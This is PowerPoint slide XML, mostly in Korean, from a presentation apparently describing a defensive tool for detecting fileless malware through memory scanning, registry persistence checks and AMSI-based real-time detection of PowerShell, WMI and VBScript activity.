            </a:p>
            <a:p>
              <a:pPr algn="just" fontAlgn="base" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="170000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="400"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>-&gt; Rule : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>악의적인 행위를 하는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>이 있는 경우 의심프로세스로 표시함</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea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9CC4091-3D44-4D76-A596-3997C58CEF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1022684" y="7246573"/>
            <a:ext cx="15068976" cy="1840394"/>
            <a:chOff x="1899179" y="3666541"/>
            <a:chExt cx="14040241" cy="1840394"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="순서도: 수행의 시작/종료 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{682F4C3E-60F9-4F3F-A512-B8BE4000AE94}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1899179" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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800" b="1" dirty="0" err="1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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>yarascan</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri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FB29ACB-36D2-4345-BE3B-D8BD83A0F588}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4674908" y="3666541"/>
              <a:ext cx="11264512" cy="1840394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fontAlgn="base" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="170000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="400"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>커널</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>유저 메모리 상에서 유니코드 및 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>ANSI </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>문자열을 나타내는 플러그인</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just" fontAlgn="base" latinLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="170000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="400"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>-&gt; Rule : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>악의적인 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>URL </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>주소나 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>IP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A3053"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>주소가 나올 경우 의심프로세스로 표시함</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A3053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8891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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="13809534" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory Analysis : GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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0D6317B-65AF-4B90-99EA-A844D8CA1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881989"/>
            <a:ext cx="10838227" cy="813402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9E8F0F78-5418-4C0A-AA53-5108973B9250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12344400" y="3810000"/>
            <a:ext cx="5486400" cy="1947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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>악성 프로세스 찾는 과정에서 선별된 프로세스를 주요 대상으로 분석  진행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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6D240C6B-8CB4-4395-9290-92E39FDD252E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11384066" y="3813942"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="1A30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1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AC9D9822-B16F-46E8-9741-60DAD2354F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="3063089"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F94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1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EE3F59B-E83F-435B-88DF-8A716C018A05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12603673" y="7295971"/>
            <a:ext cx="5173579" cy="1947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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 악성코드에 지속성을 가지게 하는 레지스트리 분류</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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848140B6-CE2F-483A-9204-721277EF24CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11554700" y="7303750"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="1A30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2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ACDAA1E5-DDF3-47BB-AD4E-DCE0DCEFA2C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419034" y="6552897"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F94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2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758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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>INDEX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127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519A0859-8B31-46F1-BF9E-EE9015286497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840165" y="8013117"/>
            <a:ext cx="6059904" cy="1005689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lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F94858"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>How? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" kern="0" spc="-100" dirty="0">
                <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>did we develop Tool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458E73-BE41-4C7D-AE4C-8B16F1936D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1938423" y="2264032"/>
            <a:ext cx="6495720" cy="1038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0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F94858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4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHY? </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Malware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DEB30D-6A80-424E-9018-4BF397D991F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840165" y="3497513"/>
            <a:ext cx="6495720" cy="1038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0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F94858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4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHAT? </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>did we analysis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0131D7-E23B-43BC-8A8C-75D23E61E31C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="4730995"/>
            <a:ext cx="6495720" cy="3323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0" indent="-7429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ko-KR" sz="3600" kern="0" spc="-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에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malware Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="0" indent="-7429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3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln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에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Event A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" kern="0" spc="-1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에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nalysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3600" kern="0" spc="-100" dirty="0">
              <a:latin typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
              <a:ea typeface="에스코어 드림 6 Bold" panose="020B0703030302020204" pitchFamily="34" charset="-127"/>
              <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="0" indent="-7429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3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln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에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Memory Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="0" indent="-7429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ko-KR" sz="3600" kern="0" spc="-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에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Real-time Detection</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln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에스코어 드림 6" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 16" descr="그리기이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D62655-0A03-4AA4-B862-1C72CFE91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274" y="5143500"/>
            <a:ext cx="3159561" cy="332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874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55B0744-E37D-41F5-8E77-B0C6A18E05BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672143" y="3454278"/>
            <a:ext cx="6134613" cy="5549354"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F3F3F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704227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Real-time Detect : AMSI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRP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91EF1C92-E784-469B-AF8F-7D9EA9D66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2902223"/>
            <a:ext cx="10890063" cy="612747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DF96CF-6D7E-4D87-ADFE-926778F8D966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16306800" y="9029700"/>
            <a:ext cx="15174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Microsoft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A675DE-7D87-416E-A073-0B8B36C25E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882316" y="3825431"/>
            <a:ext cx="5715000" cy="2077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정상 윈도우 프로세스를 통해 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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실행되는 스크립트</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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en-US" altLang="ko-KR" sz="2800" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>powershell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n-ea"/>
              </a:rPr>
              <a:t>, WMI, VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 등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n-ea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C863A4-8373-43DC-8D5D-D999A9873D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882316" y="6502468"/>
            <a:ext cx="5715000" cy="6990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n-ea"/>
              </a:rPr>
              <a:t>AMSI Scanner, Provider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0A52A-86BB-4E48-9EE2-CB815C7611FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882316" y="7934980"/>
            <a:ext cx="5715000" cy="6990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n-ea"/>
              </a:rPr>
              <a:t>Windows Defender Service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B8632C2B-02D1-485C-99BE-28DAD0584191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606466" y="6108031"/>
            <a:ext cx="266700" cy="394437"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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F42BB194-3485-4C97-AF50-26DCFE10ABBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606466" y="7493675"/>
            <a:ext cx="266700" cy="394437"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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1650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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Real-time Detect : AMSI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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3D7E0D-B73A-41FD-A477-689044F3EB13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026694" y="2476500"/>
            <a:ext cx="1665170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2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>기본 프로그램</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(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n-ea"/>
              </a:rPr>
              <a:t>UAC, PowerShell, VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 등</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>에서 실행된 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AMSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 이벤트들의 로그를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/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rgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
